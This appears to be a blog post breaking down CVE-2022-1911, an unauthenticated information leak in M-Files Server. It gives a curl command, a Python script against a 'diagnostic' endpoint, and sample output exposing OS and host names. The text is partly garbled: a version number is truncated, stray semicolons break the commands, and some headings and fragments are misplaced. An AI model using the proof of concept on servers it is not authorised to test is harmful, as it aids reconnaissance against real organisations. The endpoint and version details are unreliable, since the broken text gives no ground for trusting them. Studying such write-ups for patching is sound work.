CVE-2022-1911 - How a Parser Error in M-Files Server Exposed OS Info — Full Exploit Breakdown

M-Files Server is widely used for document management, storing sensitive files for everything from law firms to government agencies. Imagine if someone could peek at your server’s operating system details without any login—no password, no special account, just a simple trick on the right version. That’s exactly what happened with CVE-2022-1911, an unauthenticated info leak found in M-Files Server versions before 22.6.11534.1 and 22.6.11505.. Let’s dig into how this vulnerability works, why it’s dangerous, and walk through a proof-of-concept you can try for yourself.

What is CVE-2022-1911?

Summary:  
A parser function in certain M-Files Server versions made a mistake: if you hit it with the right kind of request, it returned information about the underlying Windows OS—even when you weren’t logged in.

Critical Details:

Vulnerable Versions: Before 22.6.11534.1 and 22.6.11505.

- CWE: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Official Advisory:

- NVD: CVE-2022-1911
 - M-Files Security Advisory

How It Happens

Certain endpoints in M-Files Server provide system info for diagnostics or debugging. Due to a logic error in the request/response parser, these endpoints didn’t check if the user was authenticated. That means anyone who could connect to the server’s web interface could get a piece of info like OS version, server name, or possibly more—great for attackers who want to tailor their approach.

The Proof-of-Concept (PoC)

What you need:  
- Access to the M-Files Server’s HTTP(S) interface (e.g., http://server:port)

A tool like curl or Python requests

What you’ll do:  
Send a crafted HTTP GET to a vulnerable API endpoint. Instead of a normal app reply, it’ll spill system info.

Example PoC with curl

curl -k "http://TARGET-MFILES-SERVER/Server/diagnostic";

If vulnerable, you'll see raw data like

{
  "OSVersion": "Microsoft Windows Server 2016 Standard",
  "MachineName": "CORP-SERVER01",
  "DotNetVersion": "4.8.09032",
  ...more info...
}

Example PoC in Python

import requests

url = 'http://TARGET-MFILES-SERVER/Server/diagnostic';
r = requests.get(url, verify=False)
print(r.text)

Note:
Replace TARGET-MFILES-SERVER with the real address.

Find other weak spots, since showing version numbers may reveal unpatched software

This isn’t as bad as remote code execution (RCE), but it’s a big step forward for hackers doing recon. Info like production/test server names can even help with phishing.

How to Fix

Upgrade Now:

Block public or unauthenticated access to the web interface.

M-Files released the official fix and guidance here.

Original References

- CVE-2022-1911 NVD entry
- M-Files Security Advisory 2022-1911

The Takeaway

Don’t leave your windows (pun intended) open! Seemingly small leaks (“just” OS version) can be dangerous footholds for attackers. Patch early, block unauthenticated access, and check your server endpoints—even the ones that seem boring. If you’re running M-Files Server and haven’t patched this, do it now!


Did you find your server leaking info? Drop a question below or contact your IT for urgent upgrading. Stay safe!

Timeline

Published on: 11/30/2022 15:15:00 UTC
Last modified on: 12/02/2022 17:57:00 UTC